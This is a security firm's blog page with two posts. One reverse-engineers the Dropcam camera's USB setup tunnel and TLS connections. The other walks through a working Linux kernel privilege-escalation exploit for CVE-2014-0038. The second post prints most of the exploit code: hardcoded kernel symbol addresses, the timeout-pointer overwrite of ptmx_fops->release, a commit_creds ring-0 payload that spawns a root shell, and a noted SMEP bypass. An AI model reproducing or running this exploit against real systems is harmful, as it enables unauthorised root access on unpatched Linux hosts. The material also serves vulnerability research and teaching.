Thursday, March 27, 2014

Reversing the Dropcam Part 1: Wireless and network communications

by Kris Brosch

The "Internet of Things" marketplace has been blowing up recently, and towards the end of last year we began seeing a lot of demand for security assessments of these types of platforms. To practice, we wanted to reverse engineer a consumer platform from scratch and look around for security vulnerabilities. What follows is the first of a three-part series on what we were able to do with the Dropcam. Through this research, we found the Dropcam has a pretty solid security model, so no 0day in this post. That being said, this type of reversing work is the most important prerequisite for finding security vulnerabilities, so we thought it would be great to share our findings and techniques with the security and reverse engineering communities. Hope you enjoy, and leave a comment if you have any further ideas to extend what we're showing here.

For those that don't know, the Dropcam is a cloud-based webcam. It connects to the internet over WiFi, and users interact through it entirely via the web interface, or through a mobile app. We purchased some Dropcam cameras to find out more about how it works. In this series, you'll get an idea of how the process of reversing a device like the Dropcam works including the tools we use and how we use them. This project ultimately ends up going into hardware hacking, but as you'll see below, you can often gather a lot of information about how a device works before you open the case. Everything in this first post was done without taking the Dropcam apart, while our next posts will discuss taking it apart and some hardware hacking basics.

Getting the Dropcam connected to the WiFi

As I was opening the Dropcam box, one of the first questions I asked was: how does it set up its WiFi connection? It's supposed to connect to your WiFi and present a configuration interface through, but it must have to learn at least your WiFi SSID first to do that. The documentation tells you to plug the USB cable into your computer and run through setup.

When you plug your Dropcam's USB cable into your computer, the camera enumerates as a USB mass storage device with a few files on it, including setup binaries for both MacOS and Windows:
$ find .
./Setup Dropcam (Macintosh).app
./Setup Dropcam (Macintosh).app/Contents
./Setup Dropcam (Macintosh).app/Contents/Resources
./Setup Dropcam (Macintosh).app/Contents/Resources/English.lproj
./Setup Dropcam (Macintosh).app/Contents/Resources/English.lproj/InfoPlist.strings
./Setup Dropcam (Macintosh).app/Contents/Resources/OSXSetup.icns
./Setup Dropcam (Macintosh).app/Contents/Info.plist
./Setup Dropcam (Macintosh).app/Contents/PkgInfo
./Setup Dropcam (Macintosh).app/Contents/MacOS
./Setup Dropcam (Macintosh).app/Contents/MacOS/Setup Dropcam (Macintosh)
./Setup Dropcam (Macintosh).app/winicon.ico
./Setup Dropcam (Macintosh).app/desktop.ini
./Setup Dropcam (Windows).exe
./._Setup Dropcam (Windows).exe

Here are a few lines from the output of lsusb on the host computer:
ID 0525:a4a5 Netchip Technology, Inc. Linux-USB File Storage Gadget
  idVendor           0x0525 Netchip Technology, Inc.
  idProduct          0xa4a5 Linux-USB File Storage Gadget
  iManufacturer           2 Linux with ambarella_udc
  iProduct                3 Dropcam Setup

When I ran the setup binary, it opened a web browser to
The 32-character string in the URL is the unique identifier of my Dropcam. As you go through the web interface to set up the Dropcam, your browser eventually gets sent a JSON blob from a Dropcam web server containing a list of network SSIDs, BSSIDs, and other details of wireless networks near the camera. This data is presented in a list so that the user can pick which access point they want their camera to connect to.

How does the server get the list of WiFi networks? It must be communicating with the Dropcam, but at first it's not clear how. When the device is plugged in to a USB port, the Dropcam appears only as a mass storage device so somehow a mass storage device is talking to the Internet through my computer?

To investigate further, I set up the testing environment depicted here:

The executable ran in a Windows virtual machine with Process Monitor from the Sysinternals Suite inspecting its behavior, while I captured USB traffic and network traffic from the setup executable using two instances of Wireshark on my Linux host machine. The setup executable also started the Chrome browser in the Windows VM, which I configured to use Burp suite as a proxy.

Process Monitor gave me an initial idea of what was going on:

The setup binary is first reading the .dcdata/offset file (1), then doing reads and writes directly to the "disk" (2). The .dcdata/offset file is simply a text file with a number in it:
$ cat .dcdata/offset

You can see that 1312768 is the byte-offset into the "disk" where the setup executable is reading and writing (3). Wireshark lets us see the actual data that is being transferred back and forth. Here's a screenshot of part of the USB capture:

You can see that a SCSI Write command is being made to logical block address 0xa04, with length 4 (1). 0xa04 is 2564, which multiplied by the 512-byte block size is byte 1312768. The length 4 multiplied by 512 is 2048 bytes; this write corresponds to the highlighted WriteFile command in the Process Monitor screenshot. The data being written is shown in the hexdump (2) of the URB_BULK packet (3) following the SCSI Write command packet.

What's happening is that the setup binary is communicating with the Dropcam by reading and writing network packets from and to a "magic" address on the USB mass storage "disk". By looking at multiple packets being sent over this USB channel and reading the setup binary in IDA, I was able to get an idea of the protocol.

Above is a screenshot from the IDA Pro disassembly of the Macintosh setup binary (the Mac binary had more symbols and was easier to read than the Windows binary). The screenshot shows a portion of the code involved in decoding received packets. All the packets that I captured started with the magic big-endian number 0xd409ca11. I found this code by searching in IDA for that number. You can see that that number (1) is confirmed to be a magic number by an error message that is reached when the first 4 bytes are non-zero and don't equal 0xd409ca11 (2). In addition, bytes six and seven (3) appear to be a big-endian sequence number according to another error message (4), and bytes 8 and 9 (5) turn out to be a big-endian length field. Also, the remaining two bytes – 4 and 5 – appear to increment from -1 in packets with no payload from the setup binary to the Dropcam; it is presumed that these are acknowledgment packets.

Here are some packets, extracted from my USB Wireshark capture:

Init packet, setup -> dropcam:
d4 09 ca 11 ff ff 00 00 00 05 00 ff ff 00 00      ..............

Init response packet, dropcam -> setup:
d4 09 ca 11 00 00 00 00 01 25 00 ff ff 01 08 64   .........%.....d
30 32 34 33 37 38 31 38 32 64 61 34 66 33 37 62   024378182da4f37b
30 65 39 38 31 39 34 36 39 38 39 66 34 30 61 00   0e981946989f40a.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 8c 00 00 00 0f 02 00 01 00 13 01 bb 6e 65
78 75 73 2e 64 72 6f 70 63 61 6d 2e 63 6f 6d

Ack, setup -> dropcam
d4 09 ca 11 ff ff 00 01 00 00                     ..........

Data, dropcam -> setup
d4 09 ca 11 00 00 00 01 00 81 03 00 01 00 7c 16   ..............|.
03 01 00 77 01 00 00 73 03 01 4d e5 e3 9d c8 16   ...w...s..M.....
17 eb d7 4e 78 42 02 2e ef 7d 4b 14 d9 2b ad fe   ...NxB...}K..+..
f2 e4 84 68 49 1f 0f fc 00 ab 00 00 06 c0 13 c0   ...hI...........
14 00 ff 01 00 00 44 00 0b 00 04 03 00 01 02 00   ......D.........
0a 00 34 00 32 00 01 00 02 00 03 00 04 00 05 00   ..4.2...........
06 00 07 00 08 00 09 00 0a 00 0b 00 0c 00 0d 00   ................
0e 00 0f 00 10 00 11 00 12 00 13 00 14 00 15 00   ................
16 00 17 00 18 00 19 00 23 00 00                  ........#..    

Ack, setup -> dropcam
d4 09 ca 11 00 00 00 02 00 00                     ..........

Data, setup -> dropcam
d4 09 ca 11 00 01 00 03 06 1b 03 00 01 06 16 16   ................
03 01 06 11 02 00 00 4d 03 01 52 61 ba a6 7f 84   .......M..Ra....
26 84 98 0d ed 96 f2 07 e2 90 30 9c 6d 21 9d 4f   &.........0.m!.O
fa 80 8f 91 3f 75 ba bd 01 d6 20 52 61 ba a6 7b   ....?u.... Ra..{
f6 97 94 dc 02 28 3c 49 2c 2b c4 18 f8 8d df f3   .....(<I,+......
ac e9 de d3 06 fe bc ed 25 dd 7f c0 13 00 00 05   ........%.......
ff 01 00 01 00 0b 00 03 0b 00 03 08 00 03 05 30   ...............0
82 03 01 30 82 01 e9 02 05 00 ed f7 59 0d 30 0d   ...0........Y.0.
06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 47 31   ..*.H........0G1
0b 30 09 06 03 55 04 06 13 02 55 53 31 26 30 24   .0...U....US1&0$
06 03 55 04 03 13 1d 44 72 6f 70 63 61 6d 20 43   ..U....Dropcam C
65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f   ertificate Autho
72 69 74 79 31 10 30 0e 06 03 55 04 0a 13 07 44   rity1.0...U....D
72 6f 70 63 61 6d 30 22 18 0f 32 30 30 31 30 31   ropcam0"..200101
30 31 30 30 30 30 30 30 5a 18 0f 32 30 35 30 30   01000000Z..20500
31 30 31 30 30 30 30 30 30 5a 30 3e 31 0b 30 09   101000000Z0>1.0.
06 03 55 04 06 13 02 55 53 31 1d 30 1b 06 03 55   ..U....US1.0...U
04 03 13 14 6f 63 75 6c 75 73 37 34 2e 64 72 6f   ....oculus74.dro
70 63 61 6d 2e 63 6f 6d 31 10 30 0e 06 03 55 04   pcam.com1.0...U.
0a 13 07 44 72 6f 70 63 61 6d 30 82 01 22 30 0d   ...Dropcam0.."0.

The setup binary starts out by sending an initialization command to the Dropcam (command 00 ff ff 00 00). The Dropcam replies with a packet containing its UUID (so the setup binary knows where to point the web browser), and a host for the setup binary to initiate a TCP connection to ( After that, every packet contains a 5-byte sub-header (the first byte is 0x03, the last two bytes are a length field), followed by data. This same data was captured by my other Wireshark instance which was capturing a TCP connection made from the setup binary to via a TLSv1 connection. The Dropcam requests a TCP connection be made, and the setup binary tunnels all of that connection's traffic over the USB mass storage channel.

So this is how the Dropcam connects to the internet: it appears as a USB mass storage device containing a setup executable to the host computer; the setup binary then tunnels a connection from the Dropcam over the USB link by reading and writing at a particular offset into the raw "disk" and connecting out to the internet using the host computer's internet connection. Meanwhile, the user is presented with a list of WiFi networks that the cloud server obtained over the tunneled connection. The user picks their network in the web interface, and types in their WiFi password. The selected network and password are then sent in a POST request to the cloud server, which pushes the password down to the camera, again over the tunneled connection.

Considerations for WiFi password privacy

Something that users should be aware of is that this approach requires users to upload their network password to the server, and it might not be clear to a non-technical user that they are doing this. Dropcam (the company) probably isn't doing anything directly with the transmitted WiFi encryption passwords, but there's no guarantee that an attacker who could compromise the Dropcam cloud servers wouldn't. It's always a good practice to avoid sending confidential data to the cloud instead of making the setup binary directly communicate the WiFi information to the camera, so we're not sure if there is some other product architecture reason to do this that we're not aware of.

Further exploring the encrypted connections

The Dropcam makes two outgoing TLS connections over the USB tunnel. The first is to; that connection directs the camera to connect to an “oculus” server; my Dropcam connected to The camera itself makes the same two TLS connections over WiFi once it is configured; a short connection to followed by a long-term connection to an “oculus” server. The long-term connection is used for all of the camera's communications including streaming video, configuration changes, and firmware updates.

After understanding how the Dropcam tunnels its TLS connections out over the mass storage interface, the next step was to attempt a man-in-the-middle attack on the TLS connections in order to capture their contents. However, the TLS connections utilize both client and server side certificate verification - when making the outgoing TLS connections, the Dropcam checks the server's certificate, and the server also checks the Dropcam's client certificate. Since the TLS connection endpoint is on the camera itself (not in the setup binary), I wasn't able to inspect the contents of the TLS connection until after I'd taken the Dropcam apart, which I'll describe in our next Dropcam blog post.

Follow us on twitter @IncludeSecurity and check this blog again next week for subsequent posts in this Reverse Engineering series.

Thursday, March 6, 2014

How to exploit the x32 recvmmsg() kernel vulnerability CVE 2014-0038

On January 31st 2014 a post appeared on oss-seclist [1] describing a bug in the Linux kernel implementation of the x32 recvmmsg syscall that could potentially lead to privilege escalation. It didn't take long until the first exploits appeared, in this blog post we'll walk-through the vulnerability and Samuel's Proof-of-concept exploit in detail.

The Vulnerable Linux Kernel Code

The bug is located in the x32 version of the recvmmsg syscall in the Linux kernel. The recvmmsg syscall allows for receiving multiple messages on a socket with just one syscall (and can thus increase performance in certain situations).

To be clear the x32 ABI (not to be confused with the X86 ABI) is a particular ABI and that is not enabled by default on all distributions. However, recent Ubuntu-based distributions as well as Arch Linux ones have enabled it. For more details on the x32 ABI refer to [2]. In short x32 is an ABI which takes advantage of the 64-bit environment while using 32bit pointers for less overhead. However, the x32 system calls can also be accessed by standard 64bit applications by setting adding the value of __X32_SYSCALL_BIT to 64bit system call numbers.

The CVE 2014-0038 bug is a fairly classic case of trusting user supplied input. The timeout pointer in the function below is passed directly from user space to __sys_recvmmsg, which expects a trusted pointer, without first copying the value of the user supplied pointer to a controlled kernel space variable.
The following is the code which handles the recvmmsg syscall for the x32 ABI (net/compat.c):

asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg, unsigned int vlen, unsigned int flags, struct compat_timespec __user *timeout) { int datagrams; struct timespec ktspec; if (flags & MSG_CMSG_COMPAT) return -EINVAL; if (COMPAT_USE_64BIT_TIME) /* set when doing the x32 syscall, the x32 ABI uses 64bit time values */ return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen, flags | MSG_CMSG_COMPAT, (struct timespec *) timeout); /* ... */
Pointers passed from user space are marked with the __user attribute to make sure they are only accessed through the user space API functions (e.g. copy_to_user, copy_from_user, ...). In this case though, the timeout parameter is cast directly to a type not containing the __user attribute, and then passed on to __sys_recvmmsg without any further checks on it.
Compare this to what the normal x86_64 syscall does:

SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg, unsigned int, vlen, unsigned int, flags, struct timespec __user *, timeout) { int datagrams; struct timespec timeout_sys; if (flags & MSG_CMSG_COMPAT) return -EINVAL; if (!timeout) return __sys_recvmmsg(fd, mmsg, vlen, flags, NULL); /* -1- */ if (copy_from_user(&timeout_sys, timeout, sizeof(timeout_sys))) return -EFAULT; datagrams = __sys_recvmmsg(fd, mmsg, vlen, flags, &timeout_sys); if (datagrams > 0 && copy_to_user(timeout, &timeout_sys, sizeof(timeout_sys))) datagrams = -EFAULT; return datagrams; }
At -1- the timeout struct is copied into a kernel space variable before passing it to __sys_recvmmsg. That's the correct way to do it.

Digging Deeper Into the Vulnerability

First things first: the timespec structure, defined in include/uapi/linux/time.h:

struct timespec { long tv_sec; /* seconds */ long tv_nsec; /* nanoseconds */ };
Now let's take a closer look at what happens to the timeout pointer passed from user space.
From compat_sys_recvmmsg the pointer is passed to __sys_recvmmsg, located in net/socket.c:

int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen, unsigned int flags, struct timespec *timeout) { if (timeout && /* -1- */ poll_select_set_timeout(&end_time, timeout->tv_sec, timeout->tv_nsec)) return -EINVAL; /* ... */ while (datagrams < vlen) { /* -2- */ /* * Basically just a loop calling recvmsg * until the timeout is hit or vlen messages have * been received. */ if (MSG_CMSG_COMPAT & flags) { err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry, &msg_sys, flags & ~MSG_WAITFORONE, datagrams); /* ... */ } else { err = ___sys_recvmsg(sock, (struct msghdr __user *)entry, &msg_sys, flags & ~MSG_WAITFORONE, datagrams); /* ... */ } /* ... */ if (timeout) { ktime_get_ts(timeout); // put current time into *timeout // then subtract that from end_time *timeout = timespec_sub(end_time, *timeout); /* -3- */ if (timeout->tv_sec < 0) { timeout->tv_sec = timeout->tv_nsec = 0; /* -4- */ break; } /* Timeout, return less than vlen datagrams */ if (timeout->tv_nsec == 0 && timeout->tv_sec == 0) break; } /* ... */
The first thing to note here is the block at -1-. Here poll_select_set_timeout will set end_time to the time when the timeout will be over. More importantly, it will check whether timeout points to a valid timespec struct. If it does not then it will return -EINVAL and thus cause the syscall to fail.
Here is the function performing the check (include/linux/time.h):

static inline bool timespec_valid(const struct timespec *ts) { /* Dates before 1970 are bogus */ if (ts->tv_sec < 0) /* -5- */ return false; /* Can't have more nanoseconds then a second */ if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC) /* -6- */ // include/linux/time.h: #define NSEC_PER_SEC 1000000000L return false; return true; }
At -5- the first long, tv_sec, is checked to be a positive number, meaning it's most significant byte must be smaller than 0x8, and at -6- the tv_nsec member is checked to be smaller than 1,000,000,000 (= 1 second), so tv_nsec must be between 0 and 0x000000003b9aca00. Keep this in mind as we move on.
Next the code enters the loop at -2-, waiting for incoming packets. After a packet has been received by __sys_recvmsg the timeout struct is updated to contain the time left (-3-).

If that value is < 0, both tv_sec and tv_nsec are set to zero at -4- and the function returns.
The loop will thus exit if either vlen messages have been received or the timeout is hit after receiving a packet. Do note the call will only return after a packet has been received, even if the timeout has already been hit. By sending packets to ourselves from a forked child, we can enter the code that updates the timeout at any time. And by setting vlen to 1, we can guarantee that timeout is only written to once.

The Exploitation vector

So what can we do with this situation from an exploitation perspective?

The basic idea that comes to mind is pointing the timeout pointer to sensitive kernel data with known content and waiting a specific amount of time until sending a UDP packet (thus reaching the block at -3- in the code above). This will cause the function to update the timeout structure and return.

In other words we will make the kernel treat some of its own memory (preferably a function pointer) as the timeout argument and thus cause the kernel to overwrite part of its own memory. This allows us to write a nearly arbitrary value to an address of our choosing (we have 64bit pointers so we can address the whole address space), as long as the original value is known and there is a valid timespec struct at that address.

Since kernel pointers always have the high 4 bytes set to 0xff they make a good target.
Imagine the following situation:
pointer: 0xffffffff44434241               uninitialized data
     (little endian)
| 41 42 43 44 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
                       ^ point timeout here
                       [-------- tv_sec -------] [------- tv_nsec -------]
If the address of the last (most significant) byte of the pointer is passed as a timeout, waiting >= 255 seconds will clear that byte without mangling up adjacent data as the whole block is set to zero. Repeating this for the next two bytes will allow us to point that pointer into user space (this is what the original version of the exploit did).

To speed things up the bytes can be cleared in parallel. For this to work the time between the syscall and the incoming packet must be > 254s and < 255s. This will cause the recvmmsg function to write garbage to the following two longs, as they are treated as tv_nsec value and will then contain the remaining nanoseconds of the timeout.

A Walk-through of the Proof-of-concept Exploit

Now let's start with a brief overview on the steps the exploit takes to get root privileges.
The exploit follows the common scheme of tricking the kernel into executing code in user space memory. This has quite a few advantages, including being able to write the payload in nicely readable C code. For a more detailed discussion of this technique refer to [3].

Here are the basic steps:
  • Allocate executable and writable memory at the address to which the kernel will jump, and copy the kernel payload at the end of that region.
  • Target the release function pointer of the ptmx_fops structure located in the .data  section which is writable kernel memory. Zero out the three most significant bytes, thereby turning it into a pointer inside of the region mapped by user space.
  • Open /dev/ptmx and close it, causing ptmx_fops->release() to be called.
  • Check if root privileges were obtained and start a shell.
Let's examine each of those steps in more detail.

Resolving symbols

The exploit needs four kernel symbols to be resolved, those are

#define PTMX_FOPS 0xffffffff81fb30c0LL #define TTY_RELEASE 0xffffffff8142fec0LL #define COMMIT_CREDS 0xffffffff8108ad40LL #define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
They can be taken from /boot/ or the decompressed kernel image via nm.
The PoC linked at the end of this post also contains a script ( which will help resolving with the symbols. The README in the PoC provides details on how to use it.

Setting things up

/* Prepare payload... */ printf("preparing payload buffer...\n"); code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0); memset((void*)code, 0x90, PAYLOADSIZE); code += PAYLOADSIZE - 1024; memcpy((void*)code, &kernel_payload, 1024);
The first thing the exploit does is allocate executable and writable memory at a fixed address. TTY_RELEASE is the original value of the targeted pointer in kernel space. Since the three most significant bytes of that pointer will be cleared, a mask of 0x000000fffffff000 has to be applied to it.
The memory region is then filled with nops and the kernel payload (discussed later) is copied into it.

The target

/* * Now clear the three most significant bytes of the fops pointer * to the release function. * This will make it point into the memory region mapped above. */ printf("changing kernel pointer to point into controlled buffer...\n"); target = PTMX_FOPS + FOPS_RELEASE_OFFSET; for (i = 0; i < 3; i++) { pids[i] = fork(); if (pids[i] == 0) { zero_out(target + (5 + i)); exit(EXIT_SUCCESS); } sleep(1); }
The pointer targeted in the exploit is the release function pointer of the ptmx_fops structure, which originally points to tty_release. In the Linux kernel the file_operations structure contains a bunch of function pointers to be executed when user space accesses the associated file. Examples include open, release, write, ... ptmx_fops->release is called when the last reference to that file descriptor is released. The two pointers following release are not initialized (= 0) and will thus be valid tv_nsec values. The situation is then similar to the one depicted in the diagram shown in the "Exploitation Vector" section. User space can map 0x000000ffxxxxxxxx, meaning only 3 of the 4 high order bytes of the pointer need to be cleared. To speed things up three additional processes are forked, each one clearing a byte of the pointer. (Note: The sleep(1) between each fork is done here to guarantee a different seed for srand() in each child. This is needed so every child opens a different UDP port.)

Exploiting the bug

void zero_out(long addr) { int sockfd, retval, port, pid, i; struct sockaddr_in sa; char buf[BUFSIZE]; struct mmsghdr msgs; struct iovec iovecs; srand(time(NULL)); port = 1024 + (rand() % (0x10000 - 1024)); sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd == -1) { perror("socket()"); exit(EXIT_FAILURE); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { perror("bind()"); exit(EXIT_FAILURE); } memset(&msgs, 0, sizeof(msgs)); iovecs.iov_base = buf; iovecs.iov_len = BUFSIZE; msgs.msg_hdr.msg_iov = &iovecs; msgs.msg_hdr.msg_iovlen = 1; /* * start a separate process to send a UDP message after 255 seconds so the syscall returns, * but not after updating the timeout struct and writing the remaining time into it. * 0xff - 255 seconds = 0x00 */ printf("clearing byte at 0x%lx\n", addr); pid = fork(); if (pid == 0) { memset(buf, 0x41, BUFSIZE); if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { perror("socket()"); exit(EXIT_FAILURE); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); sleep(0xfe); printf("waking up parent...\n"); sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa)); /* -1- */ exit(EXIT_SUCCESS); } else if (pid > 0) { retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr); /* -2- */ if (retval == -1) { printf("address can't be written to, not a valid timespec struct!\n"); exit(EXIT_FAILURE); } waitpid(pid, 0, 0); printf("byte zeroed out\n"); } else { perror("fork()"); exit(EXIT_FAILURE); } }
This is the key part of the exploit, we're abusing the bug as discussed in the "Exploitation Vector" section. After a lot of code to set up the structures needed for the syscall, the passed address is used as the least significant byte of the timeout pointer (-2-) and the vulnerable syscall is called.
At -2- the forked child process will wake its parent so the time difference between the syscall and the incoming packet is between 254 and 255 seconds, thus setting the least significant byte of the tv_sec member to 0.
Keep in mind that this function is executed by three child processes. The memory at the address of ptmx_fops->release roughly looks like this at the beginning:

     release pointer             uninitialized            uninitialized
| c0 fe 42 81 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
                       ^ address for child 3
                    ^ address for child 2
                 ^ address for child 1
Turning it into:
     release pointer               mangled                  mangled
| c0 fe 42 81 ff 00 00 00 | 00 00 00 00 00 xx xx xx | xx xx xx 00 00 00 00 00 |
ptmx_fops->release now points into the memory region that was mapped at the beginning.

Code execution in Ring 0

/* ... and trigger. */ printf("releasing file descriptor to call manipulated pointer in kernel mode...\n"); pwn = open("/dev/ptmx", 'r'); close(pwn);
At this point we are ready to execute our payload in ring 0 by opening a file descriptor to /dev/ptmx and immediately closing it, causing the kernel to call ptmx_fops->release in the current context.
Now if all goes well (see restrictions further down) the kernel will jump to our code, change the creds structure of our process to a new one with root privileges (and all capabilities) and return to user mode.
Let's take a closer look at how that is done next.

Kernel payload

int __attribute__((regparm(3))) kernel_payload(void* foo, void* bar) { _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; /* restore function pointer and following two longs */ *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 8)) = 0; *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 16)) = 0; /* escalate to root */ commit_creds(prepare_kernel_cred(0)); return -1; }
This is the function copied into the end of the allocated buffer at the beginning. The kernel will execute this code during the close syscall and then return back to user space. The kernel payload uses an old approach which has been documented by Brad Spengler (Spender) in his enlightenment framework [4] (see exploit.c).

Basically, after restoring the manipulated memory region, a new cred structure with full privileges is allocated by prepare_kernel_cred and afterwards passed to commit_creds to install it upon the current task. Since the exploit needs to resolve the tty_release and ptmx_fops symbols anyways this approach was chosen.

It would also be possible to change the credentials without calling any helper functions in the kernel.
This can be done by looking for a pointer to the cred structure stored in the task_struct for the current process, which can in turn be found at the beginning of the kernel stack.
By searching for memory that contains the current process uid and gid and setting those to zero, root privileges can be acquired as well.
For an example demonstrating this technique refer to the semtex.c exploit [5].


if (getuid() != 0) { printf("failed to get root :(\n"); exit(EXIT_FAILURE); } printf("got root, enjoy :)\n"); return execl("/bin/bash", "-sh", NULL);

Some notes on reliability

Since the exploit relies on timing it might be unreliable if the exploited system is under very heavy load.
If the kernel fails to reschedule the child process to wake up its parent on time (meaning within a second) the pointer will get corrupted and the exploit will fail, causing a kernel Oops.
In this case a non-threaded exploit which clears the bytes sequentially can be used. You'd want to wait 255 seconds for each byte and this guarantees that the whole timespec structure will be zeroed out when waking up the parent. This approach takes 3 times longer as the parallel version though, so approximately 13 minutes [6]. I have tested the parallel version on a system under heavy load (100% CPU usage) multiple times and have not seen the exploit fail, so I assume this to be more of a theoretical issue (setting up the sockets and rescheduling a process within one second is really no big deal, even under stress).

The original non-threaded version of this exploit in theory works reliably vs. the threaded version, but does take a while to execute.

Exploit restrictions

Since the exploit tricks the kernel into executing user space pages it can be stopped by SMEP [7]. SMEP will cause the CPU to generate a fault if it is executing code from a user space page in kernel mode. Think of SMEP as kind of a DEP/NX for the kernel. To bypass SMEP the 20th bit of CR4 can be cleared through a ROP chain. Afterwards executing code in user space is possible. This technique is described in further detail in [8]. If no gadgets can be found for writing to the CR4 register exploitation would still be possible by writing the payload in ROP entirely.
Also see the post in [9].

That's it, find the full proof-of-concept exploit code at:

If you have interesting optimizations or alternative implementations let us know via email info/at\